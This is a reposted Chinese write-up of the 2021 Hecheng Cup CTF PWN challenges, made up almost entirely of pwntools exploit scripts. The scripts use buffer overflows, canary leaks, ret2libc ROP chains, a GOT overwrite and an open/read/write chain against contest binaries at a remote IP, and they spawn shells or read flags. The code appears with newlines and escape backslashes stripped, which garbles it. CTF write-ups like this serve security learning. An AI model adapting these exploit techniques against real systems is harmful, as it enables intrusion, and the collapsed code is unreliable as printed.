2021鹤城杯|PWN部分WP全

  • A+
所属分类:CTF专场


echo

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./easyecho'#context.arch='amd64'while True :    # try :        elf=ELF(elfelf)        context.arch=elf.arch         gdb_text='''            telescope $rebase(0x202040) 16            '''         if len(sys.argv)==1 :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=process(elfelf)            # io=process(['./'],env={'LD_PRELOAD':'./'})            clibc.srand(clibc.time(0))            libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]         else :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=remote('182.116.62.85',24842)            clibc.srand(clibc.time(0))            # libc=ELF('./libc.so.6')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]           pay='a'*0x10        io.recv()        io.send(pay)        io.recvuntil('a'*0x10)        elf_base=u64(io.recv(6)+'x00x00')-0xcf0+0x202040         io.sendline('backdoor')        io.recv()         # gdb.attach(io,gdb_text)        io.sendline('a'*0x168+p64(elf_base))        io.recv()         io.sendline('exitexit')         # io.sendline(pay)         # success('libc_base:'+hex(libc_base))        # success('heap_base:'+hex(heap_base))         # gdb.attach(io,gdb_text)        io.interactive()     # except Exception as e:    #     io.close()    #     continue    # else:    #     continue



supermarket


原题 网上找的脚本

#coding:utf-8from pwn import * # context.log_level = 'debug'debug = 0 if debug == 1:    r = process('./task_supermarket')    # gdb.attach(r)else:    r = remote('182.116.62.85',27518)  def add(name, price, descrip_size, description):    r.recvuntil('your choice>> ')    r.send('1n')     r.recvuntil('name:')    r.send(name + 'n')     r.recvuntil('price:')    r.send(str(price) + 'n')     r.recvuntil('descrip_size:')    r.send(str(descrip_size) + 'n')     r.recvuntil('description:')    r.send(str(description) + 'n')  def dele(name):    r.recvuntil('your choice>> ')    r.send('2n')     r.recvuntil('name:')    r.send(name + 'n') def lis():    r.recvuntil('your choice>> ')    r.send('3n')    r.recvuntil('all  commodities info list below:n')    return r.recvuntil('n---------menu---------')[:-len('n---------menu---------')] def changePrice(name, price):    r.recvuntil('your choice>> ')    r.send('4n')     r.recvuntil('name:')    r.send(name + 'n')     r.recvuntil('input the value you want to cut or rise in:')    r.send(str(price) + 'n') def changeDes(name, descrip_size, description):    r.recvuntil('your choice>> ')    r.send('5n')     r.recvuntil('name:')    r.send(name + 'n')     r.recvuntil('descrip_size:')    r.send(str(descrip_size) + 'n')     r.recvuntil('description:')    r.send(description + 'n') def exit():    r.recvuntil('your choice>> ')    r.send('6n')  add('1', 10, 8, 'a')add('2', 10, 0x98, 'a')add('3', 10, 4, 'a')changeDes('2', 0x100, 'a')add('4', 10, 4, 'a') def leak_one(address):    changeDes('2', 0x98, '4' + 'x00' * 0xf + p32(2) + p32(0x8) + p32(address))    res = lis().split('des.')[-1]    if(res == 'n'):        return 'x00'    return res[0] def leak(address):    content =  leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)    log.info('%#x => %#x'%(address, u32(content)))    return content d = DynELF(leak, elf = ELF('./task_supermarket'))system_addr = d.lookup('system', 'libc')log.info('system 's address = %#x'%(system_addr))bin_addr = 0x0804B0B8changeDes('1', 0x8, '/bin/shx00')changeDes('2', 0x98, '4' + 'x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))changeDes('4', 8, p32(system_addr))dele('1')r.sendline('cat flag') r.interactive()



task_babyof


from pwn import *from pwn import p64, u64, p32, u32, p8 context.arch = 'amd64'context.log_level = 'debug'context.terminal = ['tmux', 'sp', '-h'] elf = ELF('./babyof')# libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') libc = ELF('./libc-2.27.so') # io = process('./babyof')io = remote('182.116.62.85','21613') prdi = 0x0000000000400743  # : pop rdiprsi = 0x0000000000400741  # : pop rsi ; pop r15 ; ret  def exp():    io.recvuntil('Do you know how to do buffer overflow?')    payload = b'a'*0x48 +         p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)    io.send(payload)     leak = u64(io.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))    info(hex(leak))    libc_base = leak - libc.sym['puts']    system = libc_base + libc.sym['system']    info(hex(system))    binsh = libc_base + next(libc.search(b'/bin/shx00'))     io.recvuntil('Do you know how to do buffer overflow?')    payload = b'a'*0x48 + p64(prdi) + p64(binsh)+p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system)  # + p64(0x40066b)    # gdb.attach(io)    io.send(payload)  exp() io.interactive()



task_littleof


#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='littleof'#context.arch='amd64'while True :    # try :        elf=ELF(elfelf)        context.arch=elf.arch         gdb_text='''            telescope $rebase(0x202040) 16            '''         if len(sys.argv)==1 :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=process(elfelf)            # io=process(['./'],env={'LD_PRELOAD':'./'})            clibc.srand(clibc.time(0))            libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]         else :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=remote('182.116.62.85',27056)            clibc.srand(clibc.time(0))            libc=ELF('./libc-2.27.so')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]           pay='a'*0x49        io.recv()        io.send(pay)        io.recvuntil('a'*0x49)        canary='x00'+io.recv(7)         pay='a'*0x48+canary+p64(0)+p64(0x400863)        pay+=p64(elf.got['puts'])+p64(elf.plt['puts'])        pay+=p64(0x400789)        io.recv()        io.send(pay)           libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['puts']        libc.address=libc_base        bin_sh_addr=libc.search('/bin/shx00').next()        system_addr=libc.sym['system']        free_hook_addr=libc.sym['__free_hook']         pay='a'*0x48+canary+p64(0)+p64(0x400863)        pay+=p64(bin_sh_addr)        pay+=p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system_addr)        pay+=p64(0x400600)        io.recv()        io.sendline('a')         io.recvuntil('Try harder!')        # gdb.attach(io,gdb_text)         io.sendline(pay)         success('libc_base:'+hex(libc_base))        # success('heap_base:'+hex(heap_base))         # gdb.attach(io,gdb_text)        io.interactive()     # except Exception as e:    #     io.close()    #     continue    # else:    #     continue



task_onecho

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./onecho'#context.arch='amd64'while True :    # try :        elf=ELF(elfelf)        context.arch=elf.arch         gdb_text='''            telescope $rebase(0x202040) 16            '''         if len(sys.argv)==1 :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=process(elfelf)            # io=process(['./'],env={'LD_PRELOAD':'./'})            clibc.srand(clibc.time(0))            libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]         else :            clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')            io=remote('182.116.62.85',24143)            clibc.srand(clibc.time(0))            libc=ELF('./libc.so.6')            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]           pay='../flag'+'x00'*0x105+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x100)        pay+=p32(0x08049812)+p32(0x0804c800)+p32(0x0804c800)        pay+=p32(0x08049180)+p32(0x8049224)+p32(0x804BFC8)        io.recv()        # gdb.attach(io,gdb_text)        io.sendline(pay)           libc_base=u32(io.recvuntil('xf7')[-4:])-libc.sym['puts']        libc.address=libc_base        bin_sh_addr=libc.search('/bin/shx00').next()        system_addr=libc.sym['system']        free_hook_addr=libc.sym['__free_hook']         pay='x00'*0x10c+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x10)        pay+=p32(libc.sym['open'])+p32(0x08049811)+p32(0x0804c801)+p32(0)+p32(0)        pay+=p32(0x08049130)+p32(0x08049811)+p32(3)+p32(0x0804c900)+p32(0x30)        pay+=p32(libc.sym['write'])+p32(0x08049811)+p32(1)+p32(0x0804c900)+p32(0x30)        io.recv()        # gdb.attach(io,gdb_text)        io.sendline(pay)         success('libc_base:'+hex(libc_base))        # success('heap_base:'+hex(heap_base))         # gdb.attach(io,gdb_text)        io.interactive()     # except Exception as e:    #     io.close()    #     continue    # else:    #     continue



- END -
2021鹤城杯|PWN部分WP全

2021鹤城杯|PWN部分WP全

原文始发于微信公众号(山石网科安全技术研究院):2021鹤城杯|PWN部分WP全

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: